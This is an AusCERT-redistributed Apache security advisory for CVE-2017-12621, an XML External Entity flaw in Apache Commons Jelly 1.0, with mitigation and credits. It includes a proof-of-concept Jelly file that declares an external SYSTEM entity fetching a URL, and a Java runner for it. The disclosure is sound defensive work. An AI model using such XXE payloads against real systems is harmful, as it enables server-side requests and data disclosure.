ESB-2017.2446 - [Win][UNIX/Linux] Apache Commons Jelly: Provide misleading information - Remote/unauthenticated 2017-09-28

Printable version
PGP/GPG verifiable version

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2017.2446
         CVE-2017-12621: Apache Commons Jelly connects to URL with
                        custom doctype definitions.
                             28 September 2017

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:          Apache Commons Jelly
Publisher:        The Apache Software Foundation
Operating System: UNIX variants (UNIX, Linux, OSX)
                  Windows
Impact/Access:    Provide Misleading Information -- Remote/Unauthenticated
                  Access Confidential Data       -- Remote/Unauthenticated
Resolution:       Patch/Upgrade
CVE Names:        CVE-2017-12621  

- --------------------------BEGIN INCLUDED TEXT--------------------

CVE-2017-12621: Apache Commons Jelly connects to URL with custom doctype definitions.

Severity: Medium

Vendor:
The Apache Software Foundation

Versions Affected:
commons-jelly-1.0 (core), namely commons-jelly-1.0.jar

Description:
During Jelly (xml) file parsing with Apache Xerces, if a custom doctype entity
is declared with a a\x{128}\x{156}SYSTEMa\x{128}\x{157} entity with a URL and
that entity is used in the body of the Jelly file, during parser instantiation
the parser will attempt to connect to said URL. This could lead to XML External
Entity (XXE) attacks. The Open Web Application Security Project suggests that
the fix be https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#XMLReader

Mitigation:
1.0 users should migrate to 1.0.1.

Example:

example.jelly
- --------------
<?xml version="1.0"?>
<!---
 Licensed to the Apache Software Foundation (ASF) under one or more
 contributor license agreements.  See the NOTICE file distributed with
 this work for additional information regarding copyright ownership.
 The ASF licenses this file to You under the Apache License, Version 2.0
 (the "License"); you may not use this file except in compliance with
 the License.  You may obtain a copy of the License at
      http://www.apache.org/licenses/LICENSE-2.0
 Unless required by applicable law or agreed to in writing, software
 distributed under the License is distributed on an "AS IS" BASIS,
 WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 See the License for the specific language governing permissions and
 limitations under the License.
- -->
<!DOCTYPE r [
        <!ELEMENT r ANY >
        <!ENTITY sp SYSTEM "http://127.0.0.1:4444/">
        ]>
<r>&sp;</r>
<j:jelly trim="false" xmlns:j="jelly:core"
         xmlns:x="jelly:xml"
         xmlns:html="jelly:html">
</j:jelly>
- --------------

ExampleParser.java
- ------------------
public class ExampleParser {
    
    public static void main(String[] args) throws JellyException, IOException, 
                    NoSuchMethodException, IllegalAccessException,IllegalArgumentException, 
                    InvocationTargetException {
        JellyContext context = new JellyContext();
        context.runScript("example.jelly", null);
    }
}

Credit:
This was discovered by Luca Carettoni of Doyensec.

References:
[1] http://commons.apache.org/jelly/security-reports.html
[2] https://issues.apache.org/jira/browse/JELLY-293

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBWcxa/ox+lLeg9Ub1AQjwoQ//Z0Ekzo11lhnYVbrYvAPav8XOdLLmDwPL
kX4q5BpemVzbtq/JFbXWch/xb3lyKqSpGD6F5xxeHDidJZRVDHvGHRJR5Ar90gTG
2A1cvcABnCYH91aC2QafUeWoYdlAaIbqVBIJpaU8lQw2d3IqapyFNZYoW3yqmdBM
SrpwxuZIP0zN1yTi96vXkIQh06cT7+KZCE/uI17LGPA84zFAUbky8rDLHRbASZgG
PmTpIMbEpCmm87A+q5XSTdgsfQsSVCJzVoe0SWqYTpzSS3XkU5R3n0SAr7ySCyZL
e0J5hQZU3PjmymFsxW4jBq5gxUWYjnxbRDZ3TaqcVBf468ZGacgdf9fFzb81/QML
WM/nC+TZTc5bZaIoexQzdoOS+9okcl2d0+tT73xeYRwUlpV3qIKKOIbK5IrhY1GP
J7/il3IETBPOiAhrPAtLcCLN0HjOXhQVoANLri1+7IpovaqoPLtn0+t1EdyuMCB4
M4P7eERXeHU+J5xbCGI2HeIfa/+leU+W/z0Fl82RgKR6dnxqJprplDh8Fm9Licxn
epwvVN5XNnsBnWui+Ck6vprj1njpC1M+Dn0TbTFVg7dhN184wOCcGtc+80klD0KR
177OFSdsb/Jp/+zJybCJb/kZbhJDIB4hfKZpGkzC7X9H6UnBkgmn0uP/R9BvHpZp
scIk1h8CStY=
=WXdN
-----END PGP SIGNATURE-----

« Back to bulletins